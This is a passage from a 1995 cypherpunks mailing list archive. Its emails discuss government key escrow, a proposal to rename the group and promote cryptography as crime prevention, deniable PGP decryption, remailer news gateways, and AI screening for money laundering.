low-entropy sources. And there would be "false positives." Some ostensibly
plaintext posts are so incoherent (;-}) they might be "rejected" by such a
GAKalyzer.)

So, is any conceivable GAK escrow system possible that cannot be used with
other crypto programs? Text is text, unless the GAK program purports to
accept or reject the text based on entropy considerations. And I can't
imagine that part of the GAK program would be robust against hacking.

>This new line will be used to respond to this argument, I think.  Even if
>it is admitted that there is no way for the government to be able to tell
>what the criminals say amongst themselves, it will still be useful to be
>able to tell what they say to other people.  Therefore software key
>escrow will be argued to still be useful even though it can be defeated.

But such traffic analyis is made moot by remailers, as we all know.

What I think we may be facing, if the folks pushing GAK are really serious
about all this, are restrictions on *who we may mail to*!!! For if Alice is
"allowed" to send a message, GAKked or not, to a remailer....

(I can speculate about laws saying only "internationally registered" sites
can use e-mail, but this seems impractical in the extreme...lots of
issues.)

The GAK advocates need to realize that superencryption will be as easy as
it is today to use PGP, and that even traffic analysis will be defeated if
remailers are used.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 13 Sep 95 07:34:42 PDT
To: cypherpunks@toad.com
Subject: CYPHERPUNK considered harmful.
Message-ID: <9509131434.AA23717@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I mailed this yesterday, but it never showed up on the list.

-----BEGIN PGP SIGNED MESSAGE-----


V Z Nuri has actually stolen my thunder a bit here, with his post on
'crypto confrontation', but I've been working on this stuff since
Friday. I have a somewhat different approach, and I'd like to see
some comment.


                  "CYPHERPUNK" considered harmful

     I would like to propose that we, the 'cypherpunks', are making a
strategic error, which will make it far more difficult to achieve the
goal we share.

     I realize that many will bridle at the notion that we have a common
goal, but I think that most of the participants in  this list will agree
with the following:

     "Strong cryptography is a powerful new technology, of which the
widespread and unfettered use should be encouraged."

     Our error lies in our approach to encouraging the widespread use of
crypto. It is an error of hubris - overweening pride.

     We too often think of ourselves as an elite - smarter and better in
various ways to our non-cpunk neighbours. We refer to these others as
'Joe Sixpack" and other such derogatary terms. 

     The problem is that in doing so we are marginalizing ourselves. 

     We call ourselves 'cypherpunks'. While this is derived from the SF
term 'cyberpunk', consider the image we are creating for ourselves:

     A 'punk' is a marginalized young adult, one who rejects the norms
of his or her society, and takes delight in irking those around him with
his or her rejection. The older of us will think of James Dean in 'Rebel
Without a Cause', or Brando in 'The Wild One'. Later, you get images
such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
other icons of the 'punk rock' movement.

    These punks are often romantic figures, but in reality they started
marginalized, remained marginalized, and died marginalized. They were
ineffective in changing the core values of the society in which they
lived (yes, I know that most the examples I've given are fictional 
characters, but I'm talking about the type of people they are modeled
on).

    We, the 'cypherpunks' have embraced this label, taking pride in our
technical abilities, and acting as if we can institute 'cryptoanarchy'
without getting a majority of the population to support us.

    This is a bad approach. The overwhelming majority of the US
population is not alienated from the US government, and regards with
suspicion those who are.

     I suggest that we drop the term 'cypherpunk' - it has the wrong
connotations to get our ideas into the mainstream. I don't have a 
perfect replacement yet:

1. I want to get away from the strings 'crypt' and c[iy]pher- they sound
too cloak-and-dagger.

2. It should imply that the labelees are level-headed, responsible
citizens, not longhaired weirdos.

3. It should make itself difficult to invert - the classic example
is the pro-choice/pro-life dichotomy, where each side refuses to
acknowledge the other's terminology.

4. A cute and apropos acronym would help.

     Many on this list have been advocating cryptography primarily as a
means of liberating ourselves from an intrusive and overcontrolling
state. This is a goal that leaves most Americans cold - they correctly
regard their country as one of the most free in the world, and are
alarmed by people who want major changes in the status quo.

     To get crypto accepted into the mainstream, we need to make it
something the average person expects and wants to use, for goals
that make mainstream sense - not for some distant, idealist utopian
cryptoanarchic libertarian dream.

     Crime is a major political hot button these days. Advocating 
crypto for preventing crime is probably the best approach we have
to getting the meme into the mainstream's ear that "I need good
crypto".


- --------------------------------------------------------------

     Towards this goal, I have written a short Q&A that could be
used as a model when discussing cryptography with non-cypherpunks.
These are UNFINISHED DRAFTS. I would welcome additions, corrections,
completions, and modifications. Please do NOT repost to other 
locations until they are finished.

     I'm trying to avoid wild anti-state tirades, giving mainstream
reasons for people to take pro-cryptography positions.

- -------------------------------------------------------------


Q: Why should I use cryptography?

A: To protect yourself against crime. Criminals have already been
caught installing "sniffers" on the Internet, and capturing passwords
and other data. Cryptography will protect you from this. It will also
protect your company against industrial espionage, and reduce fraud by
providing unforgeable and undeniable digital signatures. 

Cell phone companies currently pay $XXXX million every year due to
cellular fraud. This vast level of crime could be reduced to near zero
by cryptography, with a corrosponding reduction in cellular rates. On
top of this, a great deal of crime is committed by tapping cell phone
conversations - something that can be done by any teenager (or gangster)
with a simple scanner. Even the British royal family have had their 
privacy invaded by this method. Encryption can protect your phone
conversations, and make them as private as regular phones. Finally,
strong encryption can make the Internet safe for commerce and trade.

[We need more data on the 'sniffer' attacks which have occurred - I know
there was one on BARRNET about a year ago, and I understand that there
have been others].


Q: Won't criminals be able to evade wiretaps by encryption?

A: In theory they could. However, the FBI has not reported a single case
where cryptography has been a barrier to wiretaps [I think this is
correct - any counters?]. It turns out that criminals have not been
using strong cryptography. Even if they did start to do so, audio and
data bugs can still be planted.

Criminals *have* been tapping the unencrypted data that flows through
and is stored on the Internet, and tapping cell phone transmissions to
commit cellular fraud. Encrypting your data and communications will help
protect you against them.


Q: Aren't LEAs worried that strong encryption will make it more
difficult for them to catch crooks?

A: There's an old saying that's apropos here: "When you're up to your
ass in alligators, it's easy to forget that you're trying to drain the
swamp."

The reason we have LEAs is not to catch crooks; their purpose is to
prevent crime. Catching crooks is simply one method of doing so.
Cryptography  provides a method of preventing crime before it happens,
and putting the crooks out of business. 

To give a couple of analogies: 

1. If your house was strongly built, and no one could enter without your
consent, you would not worry about burglery. If every house was
similarly robust, burglers would be out of a job.

2. Similarly, if your car could not be broken into, damaged, or moved in
any way without your cooperation, you would not worry about car theft,
or pay for theft insurance. If all cars were similarly protected, car
theft and carjacking would no longer exist as crimes.

LEAs tend to focus on the small number of investigations which may be
hampered by good cryptography, ignoring the vast number of crimes which
would be prevented by the same technology. This is a classic example of
failing to see the forest for the trees. The widespread use of
cryptography would reduce crime to a point where many LEA employees
could retire.


Q: What's this 'key escrow' thing? 

A: Some government agencies have been trying to figure out methods which
simultaneously permit US citizens to use strong cryptography against
criminal eavesdroppers, while retaining the ease with which LEAs can
currently tap your calls. The schemes generally involve something
mistitled 'key escrow', in which copies of cryptographic keys would be
stored at sites accessible by LEAs.

Q: Why do you object to it?

A: This is a bit as if your local police department ordered you to send
them copies of all of your house, car, and office keys, so that they
could enter whenever they felt it warranted, without your knowledge.

Even assuming no keys will be leaked to criminals from such a valuable
archive, it's an incredible boondoggle. The inital cost is tens of
millions of dollars per year, by the most conservative government
estimates. In reality, it's likely to be hundreds of millions a year,
all to enable LEAs to investigate a type of crime which does not yet
occur, and may never occur.

Q: But isn't escrow required only for export

[like I said, I haven't finished]

- ------------------------------------------------------
Cute signature quotes are needed.

example:

 I lock my house. Don't you? I lock my car. Don't you?
 I lock my data.  Do you?  Use cryptography to protect
 yourself against crime.

- ------------------------------------------------------
Up to this point, I've been an advocate of crypto
without using it for much of anything - a classical
case of 'I don't have anything that needs it'.

I'm going to start clearsigning my messages with PGP.
My new key is <ptrei@acm.org> is included here, and has been 
put on the MIT server. No signatures yet (sorry I didn't 
get together with Perry in Danvers).

Here's my key:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzBST7QAAAEEAMs3b6h0lmwbELWbwoVwBVTInb3Gt0YWSamxbC/DJZ4YHqCh
2+aFZKGGlRfoaAeUeus/Vf0oLffwBMmXspSp86P1Nbk/jlR3TdwTqZA4BpcsylF9
68hJYQjrqQRoibXNyNc6O6/yyqm0MUkE1zcZAM3mW0dGV4d5+1QxhKXe9s8VAAUR
tB1QZXRlciBHLiBUcmVpIDxwdHJlaUBhY20ub3JnPokAlQMFEDBSUEJUMYSl3vbP
FQEB9Z4D/i2vJclQg4iCnHq1H02DR7az533GoRlxWIjOXd/Y1HrxSyFWcA6zTRM1
8FVFPJw4vL0qbynyCXKKTSmN4kzfSSN/Tt60UKy7i3DWZIL6J0kQIbNUxt6mMB76
4Qk3yFWebf14hg7w3e42Hngf6Nw0ZGjLdLieSlixFgg3CAFXmWVa
=DsOh
- -----END PGP PUBLIC KEY BLOCK-----

KeyId           = DEF6CF15
Key fingerprint =  07 4A 45 4E 09 F8 30 1F  78 97 AD 18 24 4E 19 E3

I'm signing this with 'pgp -sta' on a Windoze NT machine. Could 
someone check the sig and tell me if it computes?

Thanks,

Peter Trei

- -------------------------------------


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFXLXFQxhKXe9s8VAQEhewP9GFus8GXNygG3rjQqrx1uIW6Cb2QxtMZG
igKwDaSZQpp3a9Q8oQfSCbK6da6TotOOSZhI9EYG6Es31eoDhyomn2HR/Bompocl
hmkQgMqasJW37Rs1/Vw4uBfdoq0o0FiC8jLkvSj7j+pDP6FB890pWzTtEJ+t+Hqd
au6NALhGo14=
=jTar
-----END PGP SIGNATURE-----

gah - pgp has munged the dashed lines for the pubkey. Here it is again:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzBST7QAAAEEAMs3b6h0lmwbELWbwoVwBVTInb3Gt0YWSamxbC/DJZ4YHqCh
2+aFZKGGlRfoaAeUeus/Vf0oLffwBMmXspSp86P1Nbk/jlR3TdwTqZA4BpcsylF9
68hJYQjrqQRoibXNyNc6O6/yyqm0MUkE1zcZAM3mW0dGV4d5+1QxhKXe9s8VAAUR
tB1QZXRlciBHLiBUcmVpIDxwdHJlaUBhY20ub3JnPokAlQMFEDBSUEJUMYSl3vbP
FQEB9Z4D/i2vJclQg4iCnHq1H02DR7az533GoRlxWIjOXd/Y1HrxSyFWcA6zTRM1
8FVFPJw4vL0qbynyCXKKTSmN4kzfSSN/Tt60UKy7i3DWZIL6J0kQIbNUxt6mMB76
4Qk3yFWebf14hg7w3e42Hngf6Nw0ZGjLdLieSlixFgg3CAFXmWVa
=DsOh
-----END PGP PUBLIC KEY BLOCK-----


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Wed, 13 Sep 95 07:46:06 PDT
To: "David R. Conrad" <ab411@detroit.freenet.org>
Subject: Re: Scientology tries to break PGP - and
In-Reply-To: <199509131332.JAA29256@detroit.freenet.org>
Message-ID: <Pine.A32.3.91.950913102622.32299A-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 13 Sep 1995, David R. Conrad wrote:

> And the idea is that on decrypting with the 'wrong' key, it outputs the
> dummy file rather than the real plaintext, correct?

I'll say it again.  :-)

PGP could allow for an alternate secret key and a standard "dummy"
document from somewhere in your path.  A command line option would encrypt
for both keys (as if there were 2 recipients) and append the "dummy"
document to the end of the target file when encrypting. 

If decrypted with the "alternate" or "fake" secret key, the encrypted file
is wiped until it reaches a marker; the remainder of the file is
displayed.  If you use your "primary" or "real key", the extraneous text
is simply stripped. 

Alternately, the "dummy" file could overwrite the "real" message n times, 
to keep the decrypted file size more realistic.

> Why would they use your copy of the program to decrypt the file?  They
> could just use a version that lacked this 'feature'.  
A good point.  A new version of pgp would have to be incompatible with 
older versions.  That's a Very Big Hassle, I know.  But consider the 
advantage.  Nobody who has your secure key can prove that it's not the 
"real" secure key and that the decrypted file is not the real plaintext.  
They may "know" it but they can't prove it.  All they can do is force you 
to hand over *-a-* key that will decrypt the file. 

> Of course, they
> still couldn't get at the real plaintext unless you gave them the key,
> but you are right back to the same old standoff where they say, "Give
> us your key," and you (try to) say, "No."

Well yes, that is the point I'm trying to address.  The key you finally
give them *is* your secure key.  Just not the key under the blender.  They
will have a hard time arguing "But that's not what the file *really* said
and, deep inside of me, I know it!".  

I say again:  All they can do is force you to hand over *-a-* key that will
decrypt the file.  "You cannot force a mind." - J. Galt -

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMFbufqDthkLkvrK9AQEl/AP+I++gw4+zs3TBMbmLZTrydX+EQ/eJ0mX2
IxldmyS7raU1y2jGo+K3M3NYYQMmY0D9+HGKpvJef4p8GRQ6/R4beMAqsOUNgN+h
fgIt9Szf7+gVdmJas8Nu5RmFEV9l4pieoSvHfQuQnMl++BEPJ7/13vG+E22Bf5bs
tbxy1VZX4QI=
=itux
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 13 Sep 95 07:48:17 PDT
To: cypherpunks@toad.com
Subject: FUZ_fat
Message-ID: <199509131448.KAA18880@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-13-95. W$Japer:


   "Software May Dry Up Money Laundering."

      Can artificial intelligence be used to combat crime by
      ferreting out money laundering? Officials at law
      enforcement, defense and intelligence agencies like to
      think so. They have suggested creating a sophisticated
      computer program to screen records of the more than
      700,000 electronic money transfers involving U.S.
      institutions each day and to flag suspicious ones for
      further investigation. By using AI, they hope to stop
      some of the $300 billion in profits from drug deals and
      other illegal activities that they estimate is laundered
      world-wide each year. But in a report issued yesterday,
      the congressional Office of Technology Assessment says
      any such plan would face considerable obstacles.
      [Cyberian Joel Reidenberg, an OTA advisor, is quoted.]


   FUZ_fat







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 13 Sep 95 10:48:20 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <ac7c634618021004e6d8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:43 AM 9/13/95, Peter Trei wrote:

>                  "CYPHERPUNK" considered harmful
>
>     I would like to propose that we, the 'cypherpunks', are making a
>strategic error, which will make it far more difficult to achieve the
>goal we share.

Discussing some goals we might share, or ought to share, is certainly not
out-of-line. Indeed, this discussion has come up many times on this list,
though perhaps not much in the past year. (Those C coders do seem to be
having their way...:-} ).


>     Our error lies in our approach to encouraging the widespread use of
>crypto. It is an error of hubris - overweening pride.

I think many people here are doing a lot to encourage wide use of
encryption, remailers, etc. They write hooks to popular mail programs, they
give public talks, they fight against restrictions and regulations, and
they deploy new systems. That some folks have very occasionally mentioned
"Joe Sixpack" does not mean that much. in my opinion.

>
>     We too often think of ourselves as an elite - smarter and better in
>various ways to our non-cpunk neighbours. We refer to these others as
>'Joe Sixpack" and other such derogatary terms.
>
>     The problem is that in doing so we are marginalizing ourselves.
>
>     We call ourselves 'cypherpunks'. While this is derived from the SF
>term 'cyberpunk', consider the image we are creating for ourselves:
>
>     A 'punk' is a marginalized young adult, one who rejects the norms
>of his or her society, and takes delight in irking those around him with
>his or her rejection. The older of us will think of James Dean in 'Rebel
>Without a Cause', or Brando in 'The Wild One'. Later, you get images
>such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
>other icons of the 'punk rock' movement.

While I have had some qualms about the name, on balance I think it has been
good for us. After all, it's not as if _other_ groups don't already exist!
In particular, the British branch of Cypherpunks disliked the name
"Cypherpunks" so much that they used a different name for themselves, the
"U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for
whatever reasons. But the name may have been a factor, at least.

Similarly, there's the Libertarian Party, with similar themes to our own,
the International Association of Cryptographic Research (or somesuch), and
even several nascent groups like "Terra Libre" and "DigitalLiberty" which
purport to have a similar focus to what we have. And of course there are
_several_ groups devoted specifically to lobbying for various sorts of
cyberspatial rights, laws, etc.: EFF, EPIC, CPSR, VTW, and the ACLU. All of
these groups have a different focus than we have. If I were to pick one
that matches Peter Trei's proposed organization, it would be the EFF. Thus,
I suggest Peter and others of like mind look into helping out the EFF in
its worthy causes. I mean no disrespect here to Peter's views, nor am I
suggesting he leave this list. Plenty of room for support of the EFF and
being on this list. I'm a member of the EFF, for example (though their
computer has me as "Tim Mat" for some reason).

But for some reason--draw your own conclusions--the Cypherpunks list has a
membership of something like 600-800 subscribers, more if you count folks
who subscribed for a while, or who read it in other places. I don't think
"Terra Libre" or "DigitalLiberty" are quite as successful and visible.

We fill a certain niche which is useful to have filled, a more radical
facet of things. If we didn't exist, or renamed ourselves "Concerned
Citizens for Cryptographic Protection," CCCP, then somebody would have to
_invent_ the Cypherpunks!

I addressed the issue of our name, pluses and minuses, in an early chapter
of my Cyphernomicon (http://www.oberlin.edu/~brchkind/cyphernomicon/):

2.4.10. "Where did the name 'Cypherpunks' come from?"
           + Jude Milhon, aka St. Jude, then an editor at "Mondo 2000,"
              was at the earliest meetings...she quipped "You guys are
              just a bunch of cypherpunks." The name was adopted
              immediately.
             - The 'cyberpunk' genre of science fiction often deals with
                issues of cyberspace and computer security ("ice"), so
                the link is natural.  A point of confusion is that
                cyberpunks are popularly thought of as, well, as "punks,"
                while many Cyberpunks are frequently libertarians and
                anarchists of various stripes. In my view, the two are
                not in conflict.
             - Some, however, would prefer a more staid name. The U.K.
                branch calls itself the "U.K. Crypto Privacy
                Association." <check this> However, the advantages of the
                name are clear. For one thing, many people are bored by
                staid names. For another, it gets us noticed by
                journalists and others.
             -
           - We are actually not very "punkish" at all. About as punkish
              as most of our cyberpunk cousins are, which is to say, not
              very.
           + the name
             - Crypto Cabal (this before the sci.crypt FAQ folks
                appeared, I think), Crypto Liberation Front, other names
             - not everybody likes the name...such is life

--------

Getting back to your suggestion that "we" change the name to something more
respectable. How could "we" do this, given that "we" are an effective
anarchy?

I can't imagine a vote on this, and the endless debates on what "we" ought
to call ourselves would be a waste of time.

Fortunately, there's an elegant solution: form your own group.

Form your own group, your own mailing list, with a catchy name, something
like "The Privacy Education Foundation," or "The American Civil Liberties
Union" (whoops, taken), or "The Society for the Preservation of
Cyberspatial Liberty."

Then announce it on our list, and elsewhere. People will vote with their
feet. If your "meme" is catching, your list will rapidly gain members.
Maybe this Cypherpunks list will even atrophy away.

Evolution in action. The market in action. A better approach than trying to
get the name and the charter changed.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 13 Sep 95 08:01:54 PDT
To: cypherpunks@toad.com
Subject: Recent articles
Message-ID: <9509131501.AA04394@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Jon Bentley's column in this month's Unix Review talks about protecting
data.  As with all this columns, it's short but manages to touch on a
large number of issues; in this case, using page faults to guess passwords,
threat models, and so on.

Upside, "The Business Magazine for the Technology Elite" (http://www.upside.com)
has an interview with Jim Clark that took place two weeks before the IPO.
He discusses in a couple of places how using crypto over the Internet is
critical for businesses that can't afford private nets, and how this is
an important part of their business plan.

(Prof Froomkin:  Upside also has an article on "ITEF infighting" you might
want to read.)
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 13 Sep 95 08:19:14 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" and net monitoring
In-Reply-To: <199509131202.AA15294@personal.eunet.fi>
Message-ID: <9509131518.AA22994@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>> >(4) Is the April 9 statement by David Lytel of the White House Office of
>> >    Science and Technology to Amy Bauer of Copley News Service that the
>> >    administration does not monitor anti-Clinton activity on the web still
>> >    operative?

>Probably they do and they really should. If I was Mr. Clinton (which 
>I luckily am not) I would want my adjudats to prepare a report for
>me each morning summing up all the possible comments round 
>subject Clinton and The USA from NET: That would be very precisious
>source of feedback to finetune your acts. And that information 
>is real time.

Nope they don't the Democratic party aides do that type of work from Democrat 
HQ.

The President gets a once a week summary of all the mail he gets including the 
email.  I think they also provide a daily press digest.

By monitoring Lytel was probably thinking about installing net sniffers etc or 
obtaining the data from the FBI or whoever. I am certain he didn't mean to say 
that he does not surf the net ever and does not occasionaly visit opposition 
sites. 

The term monitor implies an organised search and continuous checking proceedure. 
the number of hits cited sounds more like somone passed round the URL of a kook 
site inside the office.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 13 Sep 95 09:32:16 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK/weak crypto rationale?
Message-ID: <9509131628.AA00879@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Brain Davis writes:
[...snip...]
>  Particularly effective were the court-approved video and audio
>  tapes of the Speaker taking a bribe in exchange for certain action
>  on legislation
[...snip...]
>  Wiretaps, hidden microphones, and hidden cameras put corrupt
>  politicians (I know - redundant) out of business.

Encryption does little to protect you from hidden cameras and microphones (or  
informants!).  If you already know your target then you can probably get  
around encryption (sure it's not as simple as a wiretap, but hey, nobody said  
it had to be easy).  Encryption prevents 'fishing expeditions' and  
unauthorized monitoring;  this is what the LEAs don't want to admit.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 13 Sep 95 08:57:53 PDT
To: hallam@w3.org
Subject: Web Proxy Servers
Message-ID: <199509131531.LAA18512@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 PM 9/12/95 -0400, hallam@w3.org wrote:

>If they ever want an anonymous proxy server they are wellcome to use ours.

So where's a pointer to it?  Others might be interested.  Even willing to pay.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Wed, 13 Sep 95 11:35:04 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster posting poll
Message-ID: <ac7cd3c3030210044820@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


I think that I am not being clear enough about what I want to do.

Back when I started running remailers, I was using a machine with no local
news software at all. Rather than compile a bunch of software just to allow
the "Anon-Post-To:" command to work, I hacked the scripts to automatically
send those messages to a mail2news gateway. Mixmaster now has a similar built
in anonymous posting ability. If you have inews on your machine, then Mixmaster
can build the "Newsgroups:" header and send the message to inews.
But what if you are running Mixmaster and you don't have inews but you want
to support posting? The answer is to have Mixmaster put together a message
to send to a mail2news gateway for it to post.

When I look at the currently available public mail2news gateways, I see that
two standards already exist. The first is the group.name@gateway.
The other is mail2news@gateway with a "Newsgroups:" header.

It is easy for me to have mixmaster take the request for anonymous posting,
and build the appropriate message for whichever kind of gateway I want to use.

I only want to support one of them. The question is, which one should I
support? Which are there more of. Which are there likely to be more of in the
future.

I seem to recall that someone on this list wrote some mail2news software,
Who was it and which standard did it follow (if either). Has anyone installed
it? Is anyone else planning to install it. I will install a gateway when I
get my T1 (in a couple of months).


        -Lance

At 8:35 AM 9/13/95, Rich Salz wrote:
>>       If the form alt.usenet.group@remailer.com was used, wouldn't the
>> system running the remailer have to have an alias defined for each and
>> every newsgroup that it plans on handling?
>
>No.  Sites running sendmail, for example, could set up rules that
>just knew the top-level hierarchies and fed those into a special
>"mailer" that gatewayed them.
>
>My opinion is that making any names well-known is a bad idea, and
>that attaching special semantics to "mail2news@xxx" is a real bad
>idea.  Instead, just send the message to the specified recipient
>and let do whatever magic needs to be done.
>
>If mixmaster wants to function as a mail/news gateway, it should
>do something special when it sees the Newsgroups header -- process
>the message and feed it into rnews, presumably.
>
>I guess, but not yet having read the code do not know, that this is
>cleaner and more easily extensible (or removable).
>        /r$

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 13 Sep 95 08:51:21 PDT
To: John Young <jya@pipeline.com>
Subject: Software vs Money Laundering
Message-ID: <199509131549.LAA22502@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:48 AM 9/13/95 -0400, John Young wrote:

>      Can artificial intelligence be used to combat crime by
>      ferreting out money laundering? Officials at law
>      enforcement, defense and intelligence agencies like to
>      think so. They have suggested creating a sophisticated
>      computer program to screen records of the more than
>      700,000 electronic money transfers involving U.S.
>      institutions each day and to flag suspicious ones for
>      further investigation. By using AI, they hope to stop
>      some of the $300 billion in profits from drug deals and
>      other illegal activities that they estimate is laundered
>      world-wide each year. But in a report issued yesterday,
>      the congressional Office of Technology Assessment says
>      any such plan would face considerable obstacles.
>      [Cyberian Joel Reidenberg, an OTA advisor, is quoted.]
>

Not the least of which is that money launderers can use "AI Software" to
generate a stream of real and dummy money transfers that emulates "normal"
money transfers.  Not to mention the fact that monopoly money transfer
networks that can be surveilled by the Feds (FEDWIRE and SWIFT) are not long
for this world.  They will be replaced by encrypted, open, net-based systems.

DCF

"Yes Virginia, one *can* have an encrypted, open system.  In fact, that's
the best way to have an open system."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Tue, 12 Sep 95 18:59:19 PDT
To: starrd@iia2.org (starrd)
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <Pine.BSD.3.91.950907174613.22454G-100000@usr2.primenet.com>
Message-ID: <199509130156.LAA29400@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello starrd <starrd@iia2.org>
  and Ray Cromwell <rjc@clark.net>, cg@bofh.lake.de, cypherpunks@toad.com

starrd wrote:
> On Thu, 7 Sep 1995, Jiri Baum wrote:

...
> > >: : >>: 
...[snip]
> I gotta read more of this drivil!   ROTFL!   ROTFL!!!
...

I feel I should point out that you have no proof that the text you have
attributed to me was in fact posted by me, and in fact you have reason
to believe otherwise since I usually PGP-sign my entire post including
any signature.

> I know this is somewhat off-topic, but I just *had* to say it!

Off topic, but I have been publicly accused so I feel I should publicly
respond in the same forum.


Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMFY6KixV6mvvBgf5AQELzwP6AsLfSPuRLUyXYXLYqgfyZ4FZD4BVNt14
xYj6HtZwYOgLWnfR344minIcWTNuMbgK6qbeUzWRHEfmcVZFFDHknJi2KPotDb2h
VL84dX6qLHpogCyh+bIVt2AvUoAOdYzbIKsC8tIPyaDkDhp7XNUOmXygqllkAuVo
El8eN1kuS9U=
=lqRY
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Wed, 13 Sep 95 09:10:59 PDT
To: cypherpunks@toad.com
Subject: An opportunity not to be missed
Message-ID: <199509131610.MAA26686@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It has occurred to me with the approach of the presidential campaign
in the US (and its attendant press frenzy), that there is an an
unprecedentedly vast opportunity to bring certain items on the
cypherpunk platform into the public spotlight.

There are two planks of this platform that I believe:

  1. would benefit from this exposure;
  2. would be relatively easy to inoculate among the press
     and/or the candidates (actually, inoculation of the
     candidates, with subsequent propagation by the rabid
     campaign press).

The first of these has to do with net.censorship, and formal
recognition under law of ISPs' common carrier status.  The second
concerns remailers.  I'll deal with each in turn.

I believe that, given the hunger of the candidates for as much
exposure as possible, that one of them might be persuaded to take a
part in the Scientology fracas.  (This would have to happen fairly
soon, since it looks like the Church <spit> is losing some major
battles lately - the brand new news from Denver re:FACTnet and the
ruling in VA concerning Arnie Lerma and the Washington Post).  The
desirable features of such a candidate might include: a certain amount
of current power, marginal current press exposure, fairly deep
pocketed financing, an anti- regulatory stance, and a smidgeon of net
awareness.  It should be fairly straightforward to convince such a
candidate that:

  1. there would be tremendous increase in exposure due to
     the songs of praise from netizens (whose influence is most
     likely to be overly discounted by campaign strategists,
     IMHO, at this point in time), and from the mainstream press
     (especially Time magazine and the Washington Post, for obvious
     reasons).

  2. that the exposure would be worth the peril of inviting
     the wrath of the Church <spit>.


The payback of the press coverage of such a candidate would be infection
of John Q. Public with the idea that ISPs are no more responsible for
content of carried messages than the phone company, and an anti-censorship
